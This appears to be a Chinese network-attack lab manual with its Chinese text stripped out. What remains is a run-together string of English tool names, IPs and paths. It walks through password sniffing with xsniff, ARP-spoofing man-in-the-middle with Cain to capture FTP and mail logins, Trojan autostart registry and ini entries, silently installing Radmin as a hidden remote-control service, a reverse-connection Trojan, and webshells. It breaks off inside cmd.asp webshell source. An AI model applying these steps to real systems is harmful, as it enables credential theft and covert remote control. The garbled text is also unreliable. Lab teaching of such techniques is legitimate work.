8787[]MAC48MFCIPARPRARPMACCPUCPUpromiscuousSNIFFxsniffxsniffFTP/SMTP/POP3/HTTPxsniff-tcpTCP-udpUDP-icmpICMP-pass/-addrIPIP-portport-logFile-ascASCII-hexHEX16xsniff.exe-pass-hide-logc:\pass.logxsniffc:\pass.log8888xsniff.exe-tcp-udp-asc-addr192.168.1.1192.168.1.1tcpudpASCII[]1.xsniff.exeWindowsWorkstationDC:\VmwareVmwareTools2.WindowsWorkstationDC:\xsniff.exe3.WindowsWorkstationD192.168.80.201TCPUDPICMPASCIIxsniff.exe-tcp-udp-icmp-asc-addr192.168.80.201Ctrl+CPingWindowsServerAIP192.168.80.201ping192.168.80.201WindowsWorkstationDxsniff89894.WindowsWorkstationDTCPxsniff.exe-tcp-passCtrl+CWindowsWindowsServerAIP192.168.80.201FTP@test.com192.168.80.201192.168.80.201user123456789090OutlookExpress/WindowsServerA192.168.80.201WindowsWorkstationDxsniff6.InternetExplorerWebWebWindowsServerAIP192.168.80.201[]ARPCainARPARP[]Cain[]Windows2000/XP/Server2003WindowsServerAWindowsWorkstationD[]MAC48MFCIPARPRARPMACCPUCPUpromiscuousSNIFFsniffersniffer9292ARPARPARP(AddressResolutionProtocol)TCP/IPIPMACMACMACMAC'IPMACARPIPMACTCP/IPARPIPMACarp-aARParp-dARParp-sARPIPMACA(192.168.1.1)B(192.168.1.2)AARPIPMACMACARPIPAMACFF.FF.FF.FF.FF.FF192.168.1.2MACARPBA192.168.1.2MAC00-aa-00-62-c6-09ABMACBARPBARPARPARPARPARPARPARPIPMACARPARPARP9393ABCCABCA-BCBAARP--AARPIPBIPMACCMACAARPACBABIPMACCMACABCARPAARPAARPIP-MACBBAABBABARPCA-BACCBA-----C-----BA------------BB-ACB-AAB[]1.Cainca48_setup.exeCainC:\ProgramFiles\CainWinpcapInstall2.CainCainCainC:\ProgramFiles\Caincain.exe94943.ConfigureSnifferVMwareVirtualEthernetAdapterforVMnet8IP192.168.80.14.CainStart/StopsniffersnifferSniffer9595Sniffer[ScanMACAddress]192.168.80.201WindowsServerA192.168.80.204WindowsWorkStationD5.SnifferARP192.168.80.201192.168.80.2049696OKARP6.ARP7.WindowsWorkstationDWindowsWindowsServerAIP192.168.80.201FTP@test.com192.168.80.201192.168.80.201user123456789898OutlookExpress/WindowsServerA192.168.80.201Cain9.WindowsWorkstationDInternetExplorerWebWindowsServerAIP192.168.80.201[]RadminRadmin[]RadminRadmin[]Windows2000/XP/Server2003100100WindowsWorkstationD[]/BO2000ICMPRootkit1.IEActiveXActiveXScriptAspCgiMicrosoftOfficeWordExcelPPTAdobePDFReaderFlashRealplayer2.file.exe101101Win.iniWin.ini[windows]load=run=run=c:\windows\file.exeHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionRunRunRunOnceRunOnceExRunServicesHKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersionRunRunRunOnceRunOnceExRunServicesHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersionRunRunRunOnceRunOnceExRunServicesHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunFilec:\windows\file.exeSystem.iniSystem.ini[boot]shell=Explorer.exeshell=Explorer.exefile.exe.exe.htm.txt.zip.comSvchost3.WindowsUnVisiableWindowsWindowspslist/4.102102RadminRadminRemoteAdministratorRadminDOSRadminModemModem5~10100ITRadminRadminRadminRadminRadminRadminTCP4899RadminRadminRadminRadmin[]1.3Radminr_server.exeAdmdll.dllraddrv.dll2Radminr_serverr_server5WindowsWorkstationDC:\Windows\Temp103103VmwareVmwareTools2.WindowsWorkstationDC:\Windows\Tempr_serverRadminRadminTCP48991041043.services.mscRemoteAdministratorServicer_server4.Radminradmin.exeRadminViewer5.IPDNSRadminIP192.168.80.2041051056.RadminViewer192.168.80.204Radmin192.168.80.204RadminVideoHookKernel7.RadminViewer192.168.80.204TelnetDOS1061068.RadminViewer192.168.80.204RadminWindowsC:\Windows\WindowsUpdate.log9.WindowsWorkstationDC:\Windows\Tempr_serverRadmin814107107Radmin1~655358888RadminRadminservices.mscRemoteAdministratorServicer_server10.RadminViewer192.168.80.2048888108108192.168.80.204RadminRadminRadminRadmin11.RadminRadmin7.2.[]109109[][]Windows2000/XP/Server2003WindowsServerAWindowsWorkstationD[]IPIPIPIPIPIP110110IPIPWindowsMS-DosTelnetFtpIPDNSIP111111[]1.H_Client.exe2.8000TCP8000Web8044380803.112112IPHTTPDNSIPIPIPIP192.168.80.1winkernel.exe113113Windows2000/XP/Server2003ServiceIEXPLORE.exeServer.exe1141144.Server.exeWindowsWorkstationDsetup.exesetup.exe5.1151156.WindowsC:\boot.ini7.1161168.9.Telnet11711710.11.11811812.7.3.WindowsWebshell[]ASPASPXWebshellWindowsIISWebJSPWebshellApacheTomcatWebWebshellWebWebShell[]ASPWebshellWebASPXWebshellWebJSPWebshellWeb[]Windows2000/XP/Server2003WindowsServerA[]WebshellWebshellWebWebWebShellWebshellASPASPXPHPJSPWebWebURLWeb119119Webshell80WebshellWebWebWebWebshellASPASPXPHPJSPWebshellWebshellAspWebshellASPWebshellWindowsIISWebSYSTEMGuestsASPWebshellWindowsGuestEveryoneASPWebshell1.WebshellASPWebshellcmd.asp%@Language=VBScript%%'--------------------o0o--------------------'File:Cmd.asp'Author:Maceomaceo@dogmile.com'Release:2000-12-01'OS:Windows2000,4.0NT'-------------------------------------------DimoScriptDimoScriptNetDimoFileSys,oFileDimszCMD,szTempFileOnErrorResumeNext'--createtheCOMobjectsthatwewillbeusing--'SetoScript=Serv